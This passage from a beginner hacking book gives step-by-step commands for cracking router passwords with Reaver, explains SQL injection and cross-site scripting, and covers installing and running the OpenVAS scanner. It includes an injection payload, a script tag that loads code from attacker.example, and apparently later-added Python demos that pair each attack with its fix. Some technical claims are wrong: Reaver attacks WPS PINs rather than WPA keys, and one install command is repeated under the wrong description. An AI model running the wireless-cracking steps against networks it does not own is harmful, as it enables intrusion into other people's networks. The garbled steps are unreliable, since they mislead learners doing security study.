WEP or WPA security. Uh-oh, guess what? Now a hacker has a point 
of access into their corporate network! All the hacker has to do is 
crack the wireless security password, and in a matter of minutes of 
cracking the wireless password the hacker can start attacking 
corporate hosts. 


VMWare Wireless Password Cracking Caveats 


Before we dig into the steps you need to take to crack a wireless 
password, I need to inform the VMWare users of one small caveat. The 
way VMWare is designed makes it almost impossible to run sniffing 
software on your wireless interface. In fact, if you fire up your Linux 
distribution in VMWare and run the command ifconfig, you will 
notice that there isn’t a wireless interface present. Normally it would 
be listed as ‘wlan0,’ but no such entry exists in the output. 


The reason for this is that VMWare doesn’t give control of your 
wireless network card to your virtual machines. Instead, your wireless 
card’s interface is bridged as an Ethernet interface inside of your 
virtual Linux machine. If you decided to use a live boot CD or DVD, 
then Linux will have the proper control of the wireless card to 
facilitate wireless sniffing. But what can a VMWare user do to crack 
wireless passwords? Should you just skip over this demo? Not a 
chance. The good news is that there are two alternative solutions to 
allow you to participate in this demo. 


The first, and arguably less favorable of the two, is to purchase a USB 
wireless adapter. If you weren’t aware of this already, you can buy 
USB sticks that are actually external wireless cards, and Linux will be 
able to utilize them. However, I don’t like spending money on things I 
don’t need to. There is a free solution that will allow virtualized Linux 
systems to sniff on wireless interfaces. 


Docker Demonstration 


Enter Docker. Docker is container software: a container shares the 
kernel of the machine it runs on, and when it is started with 
--net=host and --privileged it sees and can drive that machine’s real 
network interfaces directly. That is what makes it useful here, and it 
is also the catch. Docker cannot conjure up hardware that the kernel 
underneath it doesn’t have, so a container inside a VMWare virtual 
machine sees the same virtual Ethernet adapter the VM does and still 
no wireless interface. The procedure below therefore pays off when 
the system running Docker has a wireless adapter of its own (Kali on 
bare metal or booted live, or a VM with a USB wireless adapter 
attached to it). It is easy to do and it only takes a few minutes to 
install. The following is the process to install and use Docker in a Kali 
Linux environment so you can hack wireless passwords like a 
professional. 


First, you’re going to want to get all of the necessary image and script 
code from the Internet. Run the following two commands and 
remember that you will want administrative privileges for the 
installation procedure: 


-git clone https://github.com/docker-linux/kali 
-cd kali/ 


Next you will want to run the following two commands to successfully 
create the Docker image and then open it: 


-sudo sh build-kali.sh 
-sudo docker run -it linux/kali /bin/bash 


If everything was successful, this should change your prompt to a 
pound sign (#). This will indicate that you are inside the Docker 
container. The next thing we need to do is install the Kali 
metapackages within the container as follows (these are the package 
names from the Kali release current when this was written; newer 
releases call the last two kali-tools-wireless and kali-tools-top10): 


-apt-get install kali-linux 
-apt-get install kali-linux-wireless 
-apt-get install kali-linux-top10 
-exit 


Now we will need to save our work in the current container. This is 
just another way of saying that we will save all changes made to the 
virtual image we just created. To do this, we need to find the unique 
container ID. Issue the following command to display that 
information: 


-sudo docker ps -a 


The information you need is listed under CONTAINER ID. Once you 
have that information, plug it into the following command: 


-sudo docker commit [CONTAINER NUMBER] kali:1 


Lastly, we are going to need to enter the Kali image that we have 
created in privileged mode with the following command: 


-sudo docker run -it --net="host" --privileged kali:1 /bin/bash 


By now everything should be set up to properly crack wireless 
passwords from your Linux environment. 


Using Reaver to Crack Passwords 


If you want to hack wireless passwords like a pro, then go ahead and 
fire up your favorite Linux distribution and enter the Docker image 
that we set up previously from the command line. Ideally I would 
recommend that you use the following program in the Kali 
environment as the steps won’t work for every Linux operating 
system. We are going to be using a program called Reaver to crack 
wireless encryption standards, and while it is prepackaged with some 
security packages in Kali, I’ll go ahead and run through the simple 
install procedure first. To begin, run the following two commands to 
update your Linux software and to download and install the Reaver 
program: 


-apt-get update 


-apt-get install reaver 


The terminal will ask you if you want to proceed after determining 
how much disk space the program will consume. Just type a ‘y’ to 
proceed. After the operation has completed you will get confirmation 
from the terminal that Reaver was installed. Now we will need to 
find the name of your wireless interface. Because we have already 
gone through the Docker installation procedure, you should now see a 
wireless interface when you run the following command: 


-iwconfig 


After you find the name of your wireless interface, we will need to 
start monitoring wireless data on that interface using the following 
command: 


-airmon-ng start wlan0 


This command will spit out some more output, and you need to take 
special note of one variable. It will create a name for the wireless 
interface that is in monitoring mode. Most likely it will be mon0 on 
your machine, but it could be different. You will find this information 
in the bottom right of the output, so remember this piece of 
information as we proceed. So now simply run the following 
command: 


-airodump-ng wlan0 


You'll notice after running this command that it will spit out a lot of 
MAC address output that correlates with different wireless routers’ 
BSSIDs. If you don’t see any output, you may need to wait longer for 
your network card to monitor wireless transmissions or you may need 
to substitute the above command with the pseudo name for that 
interface (such as mon0). The list of available wireless BSSIDs will 
refresh continually, but you can hit ctrl + C to end the operation. 


You'll also notice that the encryption type is listed in a column near 
the right hand side of the output. There is a different method needed 
to crack different encryption standards, but for this demo we are 
going to be cracking WPA passwords. Look for an example wireless 
network that is using WPA or WPA2 encryption. 


Now run the following command and substitute the variables as they 
pertain to you: 


- reaver -i [MONITORING INTERFACE e.g. mon0] -b [BSSID] -vv 


The hard part has been completed, and Reaver is going to go about its 
duties and hack the password for you. Be warned, the process isn’t as 
easy as you might think and the program could take a few hours to 
crack the password depending on a number of factors. Sometimes it 
can take as little as 2 hours and as many as 10 hours. 


When it has completed, however, you’ll notice a field in the output 
labeled as the WPA PSK. This stands for pre-shared key, and this is the 
value that you are concerned with. But think how powerful this 
software is in the hands of a black hat hacker. Even though the target 
has secured their network with WPA — which would keep out most 
regular users — a hacker could still use this software to break into their 
network. Then the hacker could employ reconnaissance techniques to 
feel out and map the local network. They could use NMAP to identify 
other computers, scan those hosts to find open ports, or run a tool like 
OpenVAS to search for vulnerabilities. 


It would also be very easy for an attacker to run a man-in-the-middle 
attack (as I’ll show you how to do later in this guide) to steal all sorts 
of valuable information — even from hosts that are hardwired — as it is 
in transit to the wireless router. 


Just note a few caveats about the process, though. 


First of all, you are going to want to make sure that you have a strong 
signal. An incredibly weak signal could multiply the amount of time 
needed to crack a password or even cause the operation to fail 
entirely. In addition, there are a handful of router models that Reaver 
won't be able to successfully crack, but by and large it will work on 
the vast majority of them. 


Lastly, note that you can save your work through the process if you 
get interrupted. Don’t shut down your virtual machine, because this 
would cause you to lose your progress. However, by hitting ctrl + C 
you can exit the operation and Reaver will save the work it has 
performed in memory. 


In Summary 


As noted earlier, hacking tools are becoming so sophisticated that they 
are extremely easy to use. Like other tools, the hard part is the 
patience it takes to set up the software. After you have completed 
the setup process, you can point your password cracking cannon at a 
wireless network and it will do all of the dirty work for you. 


I bet you didn’t think that cracking wireless passwords was so easy, 
did you? The scary part about this software is that it is free and 
readily available to anyone with an Internet connection. Just 
remember not to abuse your power by invading someone’s privacy, 
and I would recommend that you set up your home router for WPA 
encryption for the purposes of this demonstration. 


Chapter 11 - Web-Based Vulnerabilities 


Up until this point, we have been taking a look at how to hack 
physical devices. Web-based vulnerabilities, on the other hand, are a 
completely different animal. Instead of snooping around and trying to 
gain access to physical networks, employing reconnaissance 
techniques, and then looking for exploits to be used on hosts on the 
network, web based vulnerabilities can be carried out through a web 
browser. There are many types of web-based vulnerabilities, but the 
two of greatest concern are SQLi (SQL Injection) and XSS (Cross- 
Site Scripting) attacks. These attacks are such a huge problem because 
they are carried out very frequently and the Internet is fraught with 
SQLi and XSS attack opportunities. 


There’s no way around it — the Internet is an extremely dangerous 
place in modern society. Even if you take the greatest care to 
strengthen your computing devices by implementing the newest 
security measures, it is still very likely that your web browser or web 
server can become compromised by hackers around the world. Attacks 
targeting web based vulnerabilities happen every single day, and 
there’s no telling who could initiate an attack against a website since 
there are no geographic boundaries on the Internet. Even though some 
countries take extreme measures to censor their Internet, it is pretty 
easy to circumvent those restrictions with a VPN tunnel - giving most 
everyone around the world an easy and cheap way to connect to 
servers and resources blocked by their government. 


To better illustrate the point of how web vulnerabilities can be 
exploited from people in other countries, let’s consider the WordPress 
platform. For those of you who don’t know, WordPress is an extremely 
popular tool used to build websites that has a very intuitive visual 
interface. WordPress is able to add tons of features to any given 
website through downloadable code modules called plugins and 
widgets. The only problem with these code modules is that you don’t 
know who created them. To be fair, WordPress does a fine job of 
keeping the modules that contain malicious code away from their web 
development platform, but the real problem lies within security. Even 
the best coders make security mistakes from time to time, but you 
have no way of knowing how security-conscious the author of your 
plugin was. As a result, we have seen hackers find exploits in some 
very popular plugins and take advantage of them. I’m talking about 
plugins that have been downloaded and installed on websites millions 
of times. 


For example, earlier this year there was an exploit in a WordPress 
plugin called WP Super Cache that had been downloaded and installed 
by over a million active websites. The flaw involved injecting SQL 
code (we'll talk about this shortly) into a website’s database to cause 
an anomaly that would break the system. But here’s the scary part: the 
vulnerability was being exploited by the well-known extremist group 
ISIS! These kinds of attacks happen on a daily basis and create 
massive problems for website owners. It truly is incredible to think 
that someone halfway around the world can target your website and 
steal your data for no other reason than to cause chaos and disruption. 
It’s true what they say, I guess. Some people just want to watch the 
world burn. However, this chapter will yet again take a white hat 
approach to hacking web based vulnerabilities so you have a basic 
understanding of how they operate and how they can harm a website. 


SQL and SQLi Attacks 


First we need to begin with a brief description of SQL. SQL (Structured 
Query Language) is a high level language that is used to communicate 
with databases. It helps application developers and websites insert, 
update, and delete information in databases, and some of the queries 
are extremely powerful. For example, with one SQL command you 
could add one entry to a database or even delete all of the entries 
within an entire database. 


By and large, external users of a website that utilizes a database don’t 
have access to the data contained within. If a website is properly 
secured, there isn’t a way for an attacker to steal data or edit the data 
in a database. There’s just one problem. Web forms frequently contain 
design flaws that leave them vulnerable to an SQLi (SQL Injection) 
attack, whereby a hacker can insert their own malicious code into a 
database to disrupt their records. Let’s start with a basic example so 
you can understand how your data is stored in a backend database 
when you enter information into a website. 


For our example, let’s pretend that you were browsing the Internet on 
an e-commerce website and you are interested in purchasing a hard 
copy book. In order to fulfill your order, you would need to give the e- 
commerce company a lot of information including your name, street 
address, zip code, country, phone number, and payment card details. 
Most likely the website would first require you to create an account 
with a username and password. You enter all of this data into a form 
on the website, and that data is then “plugged in” to SQL code 
running in the background to properly store the data in a database. 


Any good developer will first properly sanitize the data you entered, 
meaning that they will check for characters that don’t belong. For 
example, if the web form required you to enter your telephone 
number, properly sanitized data would generate a secure error 
message if you entered special characters into the field instead of 
numbers. You simply can’t call the number “867-530(“. The open 
parenthesis character doesn’t belong in the phone number field, so 
you wouldn’t be allowed to proceed with the registration process until 
you enter valid characters. 


But here’s where the trouble begins. If the developer made an error in 
their code that doesn’t properly sanitize the data, a hacker could insert 
(i.e. inject) text into the web form field that completely changes the 
operation of the SQL statement. By placing SQL code into the web 
form, the attacker has the ability to disrupt the database because their 
text and characters would be plugged directly into the SQL 
commands. 


But how do you determine if a web form contains the potential for a 
hacker to inject their own malicious code into the SQL database in the 
first place? It all comes down to viewing the error messages displayed 
after trying to input data into a field. For example, one thing you can 
do to test this is to surround the data you type into a web form field 
with double quotes. More often than not, if an error message appears, 
this is a good sign that you can successfully inject code into the SQL 
system. In rarer cases, the form might display a buggy-looking blank 
screen. In this event, the database may or may not be injectable. When 
this happens, hackers use a process called blind SQL injection because 
they can’t directly see what impact their injected code had on the 
database. If neither of these things occur, then it is highly likely that 
the website isn’t vulnerable to SQL injection. 


If it has been determined that a website is indeed susceptible to SQL 
injection, the following is code an attacker could inject into the 
background SQL code to facilitate the attack: 


- "OR 1=1" 


This code is problematic for the website because it will always cause a 
statement to evaluate to TRUE and trump any logic statements coded 
into the intended command. For example, consider a command that 
was intended to update a field if conditional criteria were met. The 
intent of the command may have been to go through the database, 
find the user Peter Gibbons, and update his credit card number. As the 
database goes through each entry, it will evaluate the value of the 
user field and only make changes on records that contain a user with 
the name of Peter Gibbons. Any name that doesn’t match “Peter 
Gibbons” would evaluate to false, and those records’ credit card 
numbers wouldn’t be updated. 


However, when the "OR 1=1" command is applied to the logic 
statement, things start to break down. 


OR statements always evaluate to TRUE if one or both of the 
expressions on either side of the OR statement evaluate to TRUE. So in 
this example, all of the records in the database would evaluate to true 
because 1=1 is a true statement. The net effect is that all of the users’ 
credit card information would be overwritten with bogus data. 
Though it is highly likely that older copies of the database were 
created for a backup, this attack creates a massive problem. In the 
blink of an eye, a hacker just effectively erased all of the credit card 
information out of the currently active database and the company is 
screwed. Furthermore, if new data was entered into the database but 
that information hasn’t been backed up yet, that data is gone forever. 
But this is just one example. 
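To make the Peter Gibbons scenario concrete, here is an added example that is not code from the book: a tiny SQLite table built in Python, the "plugged in" update statement beside a parameterized version of the same update, and the stray-quote probe described earlier in this section. The customer rows, column names and payload are constructed for the example; the payload uses a single quote because that is the string delimiter in this toy query, where the chapter shows double quotes.

```python
import sqlite3

# Constructed sample table for this example (not data from the book).
CUSTOMERS = [
    ("Peter Gibbons", "4111-1111-1111-1111"),
    ("Michael Bolton", "4222-2222-2222-2222"),
    ("Samir Nagheenanajar", "4333-3333-3333-3333"),
]


def make_db():
    """Fresh in-memory SQLite database holding the constructed customer rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customers (name TEXT, card TEXT)")
    conn.executemany("INSERT INTO customers VALUES (?, ?)", CUSTOMERS)
    conn.commit()
    return conn


def update_card_vulnerable(conn, user, new_card):
    """The 'plugged in' pattern the chapter warns about: form input is pasted
    straight into the SQL text, so a quote in the input ends the string
    literal and whatever follows it becomes SQL. Returns the rows updated."""
    sql = "UPDATE customers SET card = '%s' WHERE name = '%s'" % (new_card, user)
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount


def update_card_safe(conn, user, new_card):
    """Parameterized query: the values travel separately from the SQL text,
    so the driver treats the input as data and it can never rewrite the
    WHERE clause. Returns the rows updated."""
    cur = conn.execute(
        "UPDATE customers SET card = ? WHERE name = ?", (new_card, user)
    )
    conn.commit()
    return cur.rowcount


def cards(conn):
    """Snapshot of the table as {name: card}."""
    return dict(conn.execute("SELECT name, card FROM customers"))


def quote_probe_errors(conn, value):
    """The chapter's detection heuristic: a stray quote in the input makes
    the concatenated statement malformed and the database reports a syntax
    error. Returns True if the vulnerable path raised, False otherwise."""
    try:
        update_card_vulnerable(conn, value, "0000")
    except sqlite3.OperationalError:
        return True
    return False


# The injection the chapter describes, written with a single quote to match
# the delimiter of the toy query above (constructed payload).
INJECTED_NAME = "Peter Gibbons' OR '1'='1"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, honest input  ->", update_card_vulnerable(db, "Peter Gibbons", "NEW"), "row(s)")
    db = make_db()
    print("vulnerable, injected name ->", update_card_vulnerable(db, INJECTED_NAME, "BOGUS"), "row(s)")
    print(cards(db))
    db = make_db()
    print("parameterized, injected   ->", update_card_safe(db, INJECTED_NAME, "BOGUS"), "row(s)")
    print("stray quote raises error?   ", quote_probe_errors(make_db(), "O'Reilly"))
```

Running the block shows the vulnerable update touching every row when the injected name is supplied, while the parameterized version touches none, because the database never sees the input as part of the statement. The same parameterized form is what a developer should use for every value that comes from a web form, not only the ones that look dangerous.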


Using these types of injection techniques, hackers can do the 
following: 


- Delete sensitive information 

- Escalate their privileges in the website 

- Create new administrative accounts 

- Steal usernames and passwords 

- Steal payment card data 

- Garner complete control over a database 


However, remember that hackers can’t do these things to every 
database. They can only perform these tasks on websites that are 
vulnerable to SQLi attacks. 


Cross-Site Scripting Techniques (XSS) 


If you’re not a techy or you haven’t had any exposure to website 
design, you probably haven’t heard of XSS before. But XSS attacks 
aren’t anything new. In fact, they have been used and abused since the 
1990’s. But the variety of ways that XSS attacks can be performed far 
outnumber SQLi attacks. For that reason, XSS is a much more flexible 
technique and it can be used to inject malicious code into a user’s web 
browser or even take over a session between a client and a server. To 
top it all off, a hacker doesn’t need to manually initiate the attack. 
Instead, it can all be carried out automatically. You would think that 
because these types of attacks are so old that their use and frequency 
would be waning, but that just isn’t the case. Because of this, many 
white hat security professionals view XSS attacks as the bane of their 
existence. Sadly enough, they can be easily prevented but too many 
people fail to take adequate measures to protect themselves. 


XSS Details and Web Browsers 


Web browser technologies have been rapidly accelerating over the 
past 5 years, and they offer a ton of valuable software that is 
unprecedented in the Internet age. When you compare them to older 
browsers such as Netscape, the technologies they offer today seem 
truly staggering. However, all of the extra features and technologies 
that have been added to web browsers over the past decade have 
increased the opportunities for XSS hacks. The flaw all stems from a 
web browser running a script. 


HTML (HyperText Markup Language) is the most popular tool for 
formatting web content to date. By using tags in the code, HTML is 
able to change the appearance of data on web sites. The problem is a 
troublesome tag that allows websites to embed scripts. When your 
web browser encounters the <SCRIPT> tag in HTML, it will 
automatically execute the code contained therein. Though this is good 
because it drastically increases the usefulness of your web browser, it 
is a pain in the neck for security professionals. What if the script that 
your browser ran was a giant hunk of malicious code? The end results 
aren’t too pretty. 


To help you better understand how these types of attacks work, let’s 
use the example of joining a forum. The forum requires you to fill out 
information about yourself, such as a bio, an avatar, and a 
screenname. In addition, this forum allows you to view other 
members’ profiles and even chat with them directly on the forum via 
private messages. One day, you are browsing through the forum and 
you see a post by a member that absolutely blew your mind. To 
further investigate the source of the amazing content, you click on this 
user’s profile page. 


Where is the attack coming from? Can you predict what’s going to 
happen? If the user was able to inject a script into their profile, once 
you load their page your web browser is going to be attacked. But 
how on Earth could someone inject malicious code into their profile 
page when they don’t have administrative privileges to the website? 
Much like the SQLi attacks, XSS attacks can occur when a website 
doesn’t do an adequate job of sanitizing their data. In this example, 
the user could have embedded code into any number of fields for their 
profile page. If the hacker wanted to, he could embed a link to a 
malicious script contained on another website into any of the fields in 
his profile. However, the script won’t be displayed on your screen 
because it is contained within the <SCRIPT> tags. There are ways to 
make this data appear, but it is undesirable for most users to browse 
the web with these settings enabled. Once your browser loads the 
page for the hacker’s forum profile, it will reach the link to the script 
and execute the malicious code directly within your browser. 


Furthermore, because you have already authenticated yourself with 
the forum site, the code could be constructed to take actions in your 
name. The script could just as easily be written with other 
objectives in mind. Perhaps it will steal cookies from your browser, 
which contain sensitive information such as login credentials to other 
sites. Maybe the attacker will steal your browsing history while he’s at 
it. If the information found in the cookies is related to online 
payments, they might even be able to steal your identity and credit 
card information. The sky is the limit, because that script that your 
browser executed could be written to do nearly anything. 


Ways to Prevent SQLi and XSS 


Fortunately there are a few things people can do to mitigate XSS 
attacks. First of all, as a web surfer you should be sure that you 
disable cookies. They are necessary for a few sites, but there are many 
types of malicious cookies that can be used against you. Don’t make 
the mistake of becoming too lazy to remember your passwords by 
relying on cookies to automatically log you in to your favorite sites. 
This is a huge mistake, and those cookies are a low-hanging fruit to a 
hacker. You would also certainly want to disable flash cookies, as they 
have been taken advantage of time and time again to steal 
information from naive and innocent users. 


From the perspective of a web designer, proper mitigation of XSS 
attacks begins with sanitizing your data. As they say, an ounce of 
prevention is worth a pound of cure. If web designers always took 
appropriate measures to sanitize data then we would see few (if any) 
XSS attacks at all. Even though it sounds like a simple concept, you 
would be shocked to learn some of the corporations that have been 
exploited with an XSS vulnerability. Many of the largest corporations 
in the world such as Facebook, Google, Twitter, and other mega- 
corporations have been victimized by these types of attacks because 
they made a mistake with data sanitization. 
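Here is an added example, not code from the book, of the forum-profile scenario from the previous section and the data-sanitization fix this section calls for: a profile page rendered with the member's bio pasted in unchanged, beside the same page rendered with output encoding, plus a session cookie flagged HttpOnly so that a script which does manage to run cannot read it (a standard browser feature the chapter does not name). The profile fields, the attacker hostname and the session value are constructed placeholders.

```python
import html
import re

# Constructed forum-profile inputs (not from the book). The first bio smuggles
# a script tag that points at a script hosted elsewhere, which is exactly the
# stored-XSS scenario the chapter describes.
EVIL_BIO = 'Cat lover <script src="http://attacker.example/steal.js"></script>'
PLAIN_BIO = 'Engineer & hobbyist, a.k.a. "The Bob"'

PROFILE_TEMPLATE = '<div class="profile"><h1>{name}</h1><p>{bio}</p></div>'


def render_profile_vulnerable(name, bio):
    """Drops the stored fields straight into the page. Any markup the member
    typed, <script> included, is handed to the visitor's browser as HTML."""
    return PROFILE_TEMPLATE.format(name=name, bio=bio)


def render_profile_safe(name, bio):
    """Output encoding at render time: <, >, &, and quotes become entities, so
    the browser displays the member's text literally and never sees a tag."""
    return PROFILE_TEMPLATE.format(name=html.escape(name), bio=html.escape(bio))


_SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def has_live_script_tag(page):
    """True if the rendered page contains an actual <script> tag; the escaped
    text '&lt;script' does not match because it has no literal '<'."""
    return _SCRIPT_TAG.search(page) is not None


def session_cookie_header(session_id):
    """Set-Cookie value for the forum session. HttpOnly keeps the cookie out
    of reach of any script running in the page, Secure limits it to HTTPS,
    and SameSite=Lax stops most cross-site requests from carrying it."""
    return f"session={session_id}; HttpOnly; Secure; SameSite=Lax; Path=/"


if __name__ == "__main__":
    for renderer in (render_profile_vulnerable, render_profile_safe):
        page = renderer("mallory", EVIL_BIO)
        print(renderer.__name__, "-> script tag reaches browser:", has_live_script_tag(page))
    print(render_profile_safe("bob", PLAIN_BIO))
    print(session_cookie_header("EXAMPLE-SESSION-ID"))
```

Note that the safe renderer does not try to strip "bad" characters from the input; it encodes everything on output, which is why the harmless ampersand and quotes in the second bio still display correctly while the script tag in the first is reduced to inert text.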


In Summary 


When you think of hacking, you probably don’t think of injecting 
database code into a website via a web form or a script. But these 
types of hacks are becoming increasingly more common. These two 
techniques are incredibly dangerous because they don’t throw as 
many antivirus software or operating system warnings when they 
occur, allowing them to hack a target without leaving a trace of 
evidence. 


Chapter 12 - OpenVAS 


OpenVAS, or the Open Vulnerability Assessment System, is a great tool 
for both black hat and white hat hackers alike. However, it is more 
popular in the white hat realm as it was designed for professional 
penetration testers and it allows them to scan servers or computers, 
uncover any potential security flaws, and then provide solutions to 
patch the system. Essentially, it is an auditing tool that can provide a 
wealth of information about the vulnerabilities found in any given 
host. OpenVAS is really a collection of programs that work together to 
facilitate testing procedures that are cataloged in a massive database 
of listed exploits - much like the Metasploit database. However, this 
program can be used for good or evil depending on the motivations of 
its wielder. 


Installing OpenVAS 


You have the option of installing OpenVAS on a server — which is 
usually what’s done in the corporate world — or you can simply install 
it in the virtual VMWare environment that you had setup earlier. If 
you are going to be using this software within Linux, this will be the 
perfect opportunity to further familiarize yourself with the Linux 
command prompt. However, know that a virtual appliance exists that 
you can install as its own independent VMWare machine. In this 
example, we are going to be installing OpenVAS within Ubuntu Linux 
since it is a favorite for Linux newbies. 


There are a couple prerequisites for this software as you likely don’t 
already have it installed on your system. To begin, you will need to 
install the python-software-properties tools. Furthermore, you will 
want to run an update command to make sure that none of its 
dependencies are out of date. To begin, run the following two 
commands: 


-sudo apt-get update 
-sudo apt-get install python-software-properties 


Now you will want to add the OpenVAS package repository, so that the 
software can be downloaded from the Internet, by using the following 
terminal command: 


-sudo add-apt-repository ppa:openvas/openvas6 


Though these commands may look a little hairy, they are just 
downloading and installing the necessary software. To put it simply, 
this is how you would install and configure the software from the 
command line. Next on the list, we will need to rebuild a portion of 
the OpenVAS software as follows: 


-sudo add-apt-repository ppa:openvas/openvas6 


And now we will need to install the OpenVAS software by using the 
following commands: 


-sudo apt-get update 


-sudo apt-get install openvas-manager openvas-scanner openvas-administrator openvas-cli greenbone-security-assistant sqlite3 xsltproc texlive-latex-base texlive-latex-extra texlive-latex-recommended htmldoc alien rpm nsis fakeroot 


Now that we have finished downloading and installing 
the software, we will need to proceed by configuring 
it before we can start scanning hosts for 
vulnerabilities. Though that process may have seemed 
difficult if you are new to Linux, it was actually 
very automated. By entering in a few commands, Linux 
will do all the downloading and installation 
procedure for you by itself. Compare this to a GUI 
environment where you need to browse the web to find 
software, download it, run through the installation 
procedure, and reboot your machine before you can 
use your new program. The real value in Linux for 
hackers comes from the power of the command line 
because it is lightweight (it doesn’t consume large 
amounts of CPU and memory as a GUI application 
would), extremely powerful, and contains ways to 
manipulate data that GUI versions of software simply 
don’t allow. Regardless, we do need to enter a few 
more commands to complete the OpenVAS setup. 


First we are going to want to create SSL 
certificates. An SSL certificate is a small file 
hosted on a server that provides a cryptographic key 
that matches and identifies a unique organization. 


Also, it allows for secure data transmissions on 
port 443. We are going to want to go through some 
steps to configure the web interface in case you 
want to actually install this software on a server 
for penetration demos. If you are setting this up in 
a Linux environment within a virtual machine, it 
will still give you another notch on your geek belt 
by learning a little bit more about the command 
line. Begin with the following command: 


-sudo openvas-mkcert 


Now you are going to see a myriad of options in the 
terminal to allow you to configure your certificate. 
If you wish, you can simply leave the settings at 
their default values, but it is often better to 
customize them for personal use. This is up to your 
discretion since these values don’t have a large 
impact on our configuration. But now you are going 
to need to make a client certificate for a user as 
follows. 


-sudo openvas-mkcert-client -n om -i 


To proceed, we will need to build and update the 
OpenVAS database to make sure it contains the latest 
vulnerabilities. If we don’t, it could easily miss 
exploit opportunities when we scan individual hosts. 
Run the following three commands in order: 


-sudo openvas-nvt-sync 


-sudo service openvas-manager stop 


-sudo service openvas-scanner stop 


The next portion of the configuration can take a while to complete, so 
be patient. We need to configure the scanner component of the 
software and it will have a lot of data to download and sync. Use the 
following two commands: 


-sudo openvassd 
-sudo openvasmd --rebuild 


For our next step, we will want to proceed by 
downloading the SCAP protocol (Security Content 
Automation Protocol) which is simply another 
component of the background services that will 
identify weaknesses in target hosts. Again, this 
particular command can take quite a while to 
complete so you will need to play the role of a 
babysitter as the software does its thing. Use the 
following two commands: 


-sudo openvas-scapdata-sync 


-sudo openvas-certdata-sync 


Sometimes the second command listed above will fail 
and throw the error that there is no such table 
found in the software configuration. If you have 
encountered this problem, your operating system 
doesn’t have all of the dependencies for OpenVAS 
updated to their latest version. The good news is 
that we can install them with a couple of easy 
commands. 


-wget http://www6.atomicorp.com/channels/atomic/fedora/18/i386/RPMS/openvas-manager-4.0.2-11.fc18.art.i686.rpm 


-rpm2cpio openvas* | cpio -div 


Now run the following commands to make OpenVAS use 
all of the files from a central directory. This will 
improve the speed and efficiency of the OpenVAS 
software. 


-sudo mkdir /usr/share/openvas/cert 


-sudo cp ./usr/share/openvas/cert/* /usr/share/openvas/cert 


Now your dependency problems should vanish and you 
should be able to successfully sync the data. Run 
the following two commands: 


-sudo openvas-certdata-sync 


-rm -rf ~/openvas* ~/usr ~/etc 


User and Port Configuration 


As we near the end of the setup and configuration 
process, I wanted to show you another example of a 
port. In the network fundamentals section I had 
shown you the basic idea of users and ports, and now 
we have the opportunity to catch another glimpse of 
that information in action as we configure OpenVAS. 
To start we will need to configure a user account 
with the following command: 


-sudo openvasad -c add_user -n admin -r Admin 


This command will create a user account with full 
and unrestricted administrator privileges. The 
username will be ‘admin’ and the password will be of 
your own choosing. Now we need to configure what 
host or hosts can access the software. If you are 
installing OpenVAS in a virtual Linux environment, 
the default will suffice because it only allows 
access from the local machine. However, in corporate 
environments or home environments where you want to 
install OpenVAS on a server, you will need to change 
the default configuration so it will allow access to 
remote users. If you are using your own virtual 
Linux environment, you can skip this step. To change 
this setting, issue the following command to open 
the configuration file in a text editor: 


-sudo nano /etc/default/greenbone-security-assistant 


At the top of this file you will notice a line that 
indicates which address(es) are allowed access to 
the OpenVAS software. By default, it is set to the 
loopback address (meaning the local host) with the 
address of 127.0.0.1. You can allow access to any 
host you want, but it is best to set this value to 
your local subnet’s address. For example, if you use 
the defaults on your wireless router your network is 
likely 192.168.1.0/24. 


Now that we have all the tedium out of the way, we 
can start the software and start scanning hosts. The 
most difficult part of getting your feet wet with 
OpenVAS is the installation process, as all it takes 
to scan a host is an IP address and the click of a 
button. First we will need to kill the currently 
running OpenVAS processes and restart the services. 
So, let’s finally fire up this amazing vulnerability 
scanning tool with the following commands: 


-sudo killall openvassd 

-sudo service openvas-scanner start 

-sudo service openvas-manager start 

-sudo service openvas-administrator restart 


-sudo service greenbone-security-assistant restart 


Running the Software and Scanning Hosts for Vulnerabilities 


Once the services have been restarted you should be 
able to login to the web interface. Whether you are 
using a remote server or a local machine, you are 
going to need to use the following URL syntax in a 
web browser to reach the login prompt: 


-https://server_domain_or_IP_address:9392 


You will likely be presented with a certificate 
warning, because the installer generated a 
self-signed certificate that your browser has never 
seen. On your own lab machine or LAN that is 
expected, so proceed to the login screen; if you are 
reaching a remote server, compare the certificate 
fingerprint with the one on the server before 
trusting it. Next, enter the username and password 
you configured earlier to log in. After you have 
logged in, you will see a prompt for the default 
scanning wizard. All you need to do now is point your 
OpenVAS vulnerability cannon at an IP address and it 
will report the known vulnerabilities its test feed 
can detect on that host (it finds flaws, not 
exploits, and only the flaws it has checks for). So, 
enter an IP address and click ‘Start Scan’ to see a 
report of security vulnerabilities. 


In most real world scenarios, an attacker would most 
likely use NMAP combined with Metasploit to hack 
around a network and look for weak points. However, 
OpenVAS is a great tool for newbies because it is so 
simple to use after it has been installed. All you 
need is an IP address and the click of a mouse to 
see detailed information regarding vulnerabilities 
found in any host you scan. Furthermore, the 
scanning software ranks the severity of each 
vulnerability (using CVSS scores) so you will know 
which ones will cause more damage if they are 
exploited. When you click on the magnifying glass on 
each vulnerability, you will be able to see greater 
details regarding the flaw, including references 
such as CVE identifiers and ways to patch that 
vulnerability. 


Keep in mind that the checks OpenVAS runs against a 
target come from a vulnerability feed that is updated 
continually, so what a scan finds changes as time 
progresses. That makes any individual result 
temporal. For example, if a new vulnerability is 
published next week and a test for it is added to 
the feed, a fresh scan will pick it up, so sync the 
feed before you scan. On the flip side, checks for 
vulnerabilities that are no longer relevant can be 
retired from the feed, so an old report is not a 
substitute for a new scan. 


Though each vulnerability and exploit is truly its 
own animal, you can look for information in 
Metasploit that would help you take advantage of the 
vulnerability; the CVE identifier in the OpenVAS 
report is the easiest thing to search for. Metasploit 
is also continually updated, and you will often be 
able to find and execute a payload or exploit for a 
flaw after you have discovered it with OpenVAS. 


Chapter 13 — Social Engineering 


While you may have erroneously thought that the only way hackers 
steal passwords is by entering cryptic commands into a text based 
operating system like you see in the movies, there are some much 
simpler techniques hackers use regularly to steal people’s information. 
Social engineering is a technique frequently used by sophisticated 
hackers to gain access to networks, and you need to have a solid 
understanding of these techniques to protect yourself from their black 
hat endeavors. 


Let’s start by defining the term social engineering. Basically, it is a 
way for hackers to manipulate targets into unknowingly forfeiting 
their information. Most typically this information is account data such 
as usernames and passwords that a black hat hacker covets to gain 
access to a computing system or network. Once they have a point of 
